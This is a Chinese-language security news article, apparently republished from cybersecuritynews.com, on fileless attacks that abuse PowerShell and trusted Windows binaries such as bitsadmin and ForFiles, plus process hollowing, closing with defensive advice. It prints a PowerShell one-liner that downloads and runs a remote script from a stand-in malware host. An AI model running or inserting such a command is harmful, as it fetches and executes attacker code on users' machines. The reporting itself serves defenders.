![黑客利用PowerShell和Microsoft合法应用程序来部署恶意软件]( "黑客利用PowerShell和Microsoft合法应用程序来部署恶意软件")
网络安全专家最近观察到攻击方法的一个令人担忧的趋势,威胁行为者越来越多地利用无文件技术,将 PowerShell 和合法的 Microsoft 应用程序武器化,以部署恶意软件,同时逃避检测。这些复杂的攻击主要在内存中运行,留下最少的取证证据,并绕过依赖于基于文件的检测方法的传统安全解决方案。
无文件攻击尽管已经存在了二十多年,但仍然给安全团队带来重大挑战。根据最近的安全报告,现在大约三分之一的攻击采用无文件技术,这使它们成为当今网络环境中普遍存在的威胁。攻击者的吸引力在于他们能够通过利用受信任的系统组件在雷达下作,而不是引入易于检测的恶意可执行文件。这些攻击通常从包含恶意宏或欺骗性快捷方式文件的看似无害的文档开始,但很快就会过渡到驻留在内存中的作。
攻击者不是将文件写入磁盘,而是将恶意代码直接注入正在运行的进程中,或利用内置的 Windows 工具来执行其有效负载,这使得传统安全解决方案的检测变得极其困难。
网络安全分析师 Amr Thabet 指出,由于其强大的脚本编写功能以及与 Windows 系统的深度集成,PowerShell 已成为这些攻击的主要工具。
威胁行为者经常使用直接在内存中下载和执行恶意代码的命令:.iex((New-Object Net.WebClient).DownloadString('https://malware.com/payload.ps1'))
此技术绕过基于文件的检测,因为有效负载永远不会接触磁盘。
LOLBAS 技术的兴起
特别令人担忧的是 Living Off The Land 二进制文件和脚本 (LOLBAS) 的日益滥用,这涉及将合法的 Microsoft 应用程序重新用于恶意目的。
例如,据观察,攻击者在系统空闲时使用 bitsadmin.exe(一种受信任的 Windows 组件)下载恶意软件负载。
![黑客利用PowerShell和Microsoft合法应用程序来部署恶意软件]( "黑客利用PowerShell和Microsoft合法应用程序来部署恶意软件")
LOLBAS 项目
这些命令创建了任务来检索恶意文件,并通过一系列操作执行它们,例如:`bitsadmin /create`,随后是配置和执行负载的附加命令。
其他被武器化的合法应用程序包括ForFiles.exe,APT41曾使用它通过执行命令提示符命令来维持持久性。
攻击者利用这些受信任的二进制文件,将其活动与正常的系统操作混合在一起,使得传统安全工具几乎无法区分合法使用和恶意利用。
内存注入技术进一步增加了检测的难度,因为攻击者可以将他们的恶意软件伪装在诸如chrome.exe或svchost.exe等合法进程中。
进程空洞化(Process hollowing)是一种最初由Stuxnet推广的技术,它涉及以挂起模式执行合法应用程序,将其代码替换为内存中的恶意软件,然后恢复执行——从而有效地将恶意活动隐藏在受信任的进程名称背后。
安全专业人士建议实施具有内存分析功能的全面端点检测和响应解决方案,启用PowerShell日志记录和监控,实施受限语言模式,并主动监控Active Directory中的可疑活动,以防御这些复杂的威胁。
原文来自: cybersecuritynews.com
原文链接: https://cybersecuritynews.com/hackers-weaponizing-powershell-microsoft-legitimate-apps/
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/3794169.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论